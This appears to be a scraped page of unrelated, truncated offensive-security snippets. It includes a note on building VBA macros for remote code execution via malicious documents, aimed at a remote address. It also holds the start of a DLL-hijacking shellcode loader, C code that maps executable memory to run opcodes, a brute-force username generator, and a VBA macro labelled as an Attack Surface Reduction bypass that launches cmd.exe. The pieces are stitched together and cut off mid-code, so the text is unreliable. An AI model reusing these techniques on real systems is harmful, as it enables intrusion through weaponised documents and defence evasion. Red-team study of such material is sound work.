servomekanism

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

analyze all: aa
show sections: iS
list functions: afl
list imports: ii
list entrypoints: ie
seek to function: s sym.main

Perfect Loader Implementations

Thank you to SpecterOps for supporting this research and to Lee and Sarah for proofreading and editing! Crossposted on the SpecterOps Blog.

TLDR: You may use fuse-loader or perfect-loader as examples for extending an OS's native loader to support in-memory libraries.

Some software applications require the ability to load dynamic libraries from the memory of the application's own process. The majority of desktop OSes do not support this use case, so a number of developers have reimplemented the process of loading a library to overcome this limitation.

Pwntools Cheatsheet

Program Interaction
Environment and Contexts
Logging and Output
Encoding, Packing and Utility
Assembly and Shellcraft
ELFs, Strings and Symbols
Return Oriented Programming
SROP and Sigreturn Frames

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

Page substiution macro for luring user to click Enable Content
The Unicorn Powershell based payload

	# Install metasploit
	curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

	chmod 755 msfinstall
	./msfinstall

	# Create msf database.
	msfdb init

	# Launch msfconsole

	// Dll Hijacking via Thread Creation
	// Author - Vivek Ramachandran
	// Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com
	// Free Infosec Videos -- http://SecurityTube.net



	#include <windows.h>
	#define SHELLCODELEN 2048

	<?xml version="1.0" encoding="UTF-8"?>

	<opml version="1.0">
	<head>
	<title>Matt subscriptions in feedly Cloud</title>
	</head>
	<body>
	<outline text="RedTeaming" title="RedTeaming">
	<outline type="rss" text="Strategic Cyber LLC" title="Strategic Cyber LLC" xmlUrl="http://blog.strategiccyber.com/feed/" htmlUrl="https://blog.cobaltstrike.com"/>
	<outline type="rss" text="Silent Break Security" title="Silent Break Security" xmlUrl="http://silentbreaksecurity.com/feed/" htmlUrl="https://silentbreaksecurity.com"/>

	#include <windows.h>
	#include <iostream>

	int main(){
	//code that just returns 5+5 (10)
	static const int code_lenght = 44;
	unsigned char opcodes[code_lenght] = "\x55\x48\x89\xe5\xb8\x0a\x00\x00\x00\x5d\xc3";

	HANDLE mem_handle = CreateFileMappingA( INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, code_lenght, NULL);

	#!/usr/bin/env python3

	'''
	NameMash by superkojiman

	Generate a list of possible usernames from a person's first and last name.

	https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
	'''

	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub